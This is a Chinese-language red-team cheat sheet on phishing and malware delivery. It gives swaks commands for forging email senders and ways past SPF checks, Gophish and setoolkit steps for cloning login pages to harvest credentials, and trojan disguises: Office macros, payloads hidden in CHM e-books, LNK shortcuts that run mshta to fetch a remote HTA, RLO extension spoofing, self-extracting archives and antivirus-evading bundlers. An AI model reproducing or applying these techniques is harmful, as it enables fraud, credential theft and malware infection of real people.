邮件伪造

SPF

发件人策略框架，电子邮件认证机制

如何判断

1 2	dig -t txt qq.com nslookup -type=txt qq.com

"v=spf1 -all" (拒绝所有，表示这个域名不会发出邮件)

"v=spf1 +all" (接受所有)

"v=spf1 ip4:192.168.0.1/16 -all" (只允许 192.168.0.1/16 范围内的IP发送邮件)

"v=spf1 mx-all" (允许当前域名的 mx记录对应的IP地址发送邮件)

"v=spf1 mx mx:test.example.com -all" (允许当前域名和test.example.com 的mx记录对应的IP地址发送邮件)

"v=spf1 a mx ip4:173.194.72.103 -all" (允许当前域名的 a 记录和 mx 记录和一个给定的IP地址发送邮件)

"v=spf1 include:example.com -all" (采用和 example.com 一样的SPF记录)

如果存在SPF，会检测发送的域名
不存在SPF，可以伪造发件人，实现钓鱼攻击

伪造

无SPF

swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "安全测试部" --ehlo shabimeiquo -header "Subject:测试" --body 我们做了一个测试 --to ivcdnvmooq@iubridge.com

有SPF

软刚发信人:(修改字眼)

简单来说就是system@notice.aliyun.com是正常的做了SPF的域名，只要修改这个域名让他不是notice.aliyun.com比如加个.cn就可以绕过了

硬刚发信人:(转发突破)

注册一个邮箱开启POP3转发

使用网上已知的邮箱系统

1、将要发送的邮件导出EML模版
2、修改内置的发件人内容时间等

1	swaks --to 收信人 -f 发信人 --data 1.eml --server smtp.163.com -p 25 -au 帐号 -ap 授权码

Gophish

配置发件接口(自定义)
配置发信模版(更逼真)
配置触发页面(钓鱼用)
配置收信人地址(批量套)

网址克隆

工具

`setoolkit`克隆

# 启动SET
setoolkit
# 选择社会工程学攻击
1
# 选择网站攻击向量
2
# 选择凭证收集攻击
3
# 选择站点克隆器
2
# 输入要克隆的网址，例如：
https://example.com/login

Gobin

支持反向代理，可以隐藏自己

代码修改

显示二维码url地址

钓鱼页面的二维码，来源是由攻击方二维码产生
- 修改钓鱼页面，固定好攻击方的二维码url路径
攻击方的二维码，来源是由钓鱼页面的二维码产生的

木马伪装

`office`宏对象

生成

1	Attacks-->Packages-->MS offices Macro

启动宏代码的后缀.docm、xlsm、pptm
所有版本都兼容.doc、xls、ppt

`office`CVE利用

缺点：必须特定版本才行
优点：无需宏确认，直接就能用

`CHM`电子书

找一个正常的CHM电子书，解压
将payload插入其中或整个页面中
加载编译，当电子书打开修改页面后上线

解压命令 hh -decompile .\\html xx.CHM

`LNK`快捷方式

生成:Attacks->Packages->Html Application
上传:Attack->Web Drive by->Host file
执行C:\Windows\System32\mshta.exe http://xxx.xxx.xxx/x.ext
伪装
- 创建快捷方式
- 生成HTA并上传
- 属性更改目标执行
- 属性更改图标伪装

`exe`隐藏

`RLO`更改后缀

经过免杀后的exe程序(xgpj.exe)，进行重命名，在gpl位置插入Unicode控制字符，RLO(从左到右覆盖)

压缩包自解压

对压缩包设置自解压，可以自己主动释放木马，控制下载机，同时也要结合RLO进行后缀隐藏

文件捆绑

需要注意的点：
通过测试发现，普通文件rar进行压缩释放，安全软件不会报毒，但是如果是一些其他个人开发的捆绑压缩工具，安全软件会报毒，所以一般选用白名单的工具（不会报毒的捆绑工具）